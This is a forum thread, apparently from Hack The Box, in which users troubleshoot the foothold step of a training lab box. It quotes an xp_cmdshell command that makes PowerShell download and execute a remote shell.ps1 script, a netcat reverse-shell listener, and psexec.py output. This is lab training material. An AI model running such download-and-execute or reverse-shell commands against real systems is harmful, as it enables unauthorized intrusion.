Starting Point Foothold

I am in the foothold step of starting point and get an error:

“Unable to connect to the remote server”

This is when I am trying to run the command on the 10.10.10.27 box: xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString("hxxp://10.10.14.3/shell.ps1");"

I have been trying to figure it out but am just stuck at this point. I can access the HTTP server locally from my machine and see the shell.ps1 file in the directory, but I am just unable to get this connection.

I ran the ufw commands and it shows "Rules updated"; not sure if there might be a config that needs to be changed on the router to allow this through or not.

I have the same problem :cry:

Should I be able to ping the 10.10.14[.]3 from the 10.27 box?

I solved mine, @turboedbird. When you run the PowerShell command you have to enter your IP address, which you can find with sudo ifconfig, and specify port 80, for example x.x.x.x:80.

The IP in shell.ps1 should be your own HTB-assigned IPv4 address. You can look up your IP addresses like so.

$ ifconfig tun0
inet x.x.x.x
inet6 dead:beef:x::x

inet is your IPv4 address while inet6 is your IPv6 address.

After which, you should start your netcat listener like so.

$ sudo nc -lnvp 443

@limbernie said:

The IP in shell.ps1 should be your own HTB-assigned IPv4 address. You can look up your IP addresses like so.

$ ifconfig tun0
inet x.x.x.x
inet6 dead:beef:x::x

inet is your IPv4 address while inet6 is your IPv6 address.

After which, you should start your netcat listener like so.

$ sudo nc -lnvp 443

Thanks, figured it was something I was overlooking. I was able to connect.

When I try running this command I get this error: bash: syntax error near unexpected token `('

I changed my IP address in my ps1 file but I'm not sure why I'm getting this error.

@zillakami did you find the solution by any chance? I am at the same stage with the same problem. Any help would be appreciated.

@FaridKhan

@FaridKhan Make sure you're following the directions very closely. When you run the command, make sure you're still in that mssqlclient.py session.

Hello all, in the last step I am not able to get the shell:
psexec.py administrator@10.10.10.27

[*] Requesting shares on 10.10.10.27.....
[*] Found writable share ADMIN$
[*] Uploading file UndBnlSC.exe
[*] Opening SVCManager on 10.10.10.27.....
[*] Creating service hFWB on 10.10.10.27.....
[*] Starting service hFWB.....
[!] Press help for extra shell commands
[*] Process   finished with ErrorCode: 1, ReturnCode: 0
[*] Opening SVCManager on 10.10.10.27.....
[*] Stoping service hFWB.....
[*] Removing service hFWB.....
[*] Removing file UndBnlSC.exe..

Has anyone faced this issue?

@limbernie said:

The IP in shell.ps1 should be your own HTB-assigned IPv4 address. You can look up your IP addresses like so.

$ ifconfig tun0
inet x.x.x.x
inet6 dead:beef:x::x

inet is your IPv4 address while inet6 is your IPv6 address.

After which, you should start your netcat listener like so.

$ sudo nc -lnvp 443

Hello @limbernie,

When I run this command I can see the HTTP call being made in my terminal, but nothing happens afterwards.

I have changed my IP in both the above command and in shell.ps1.
Please help me.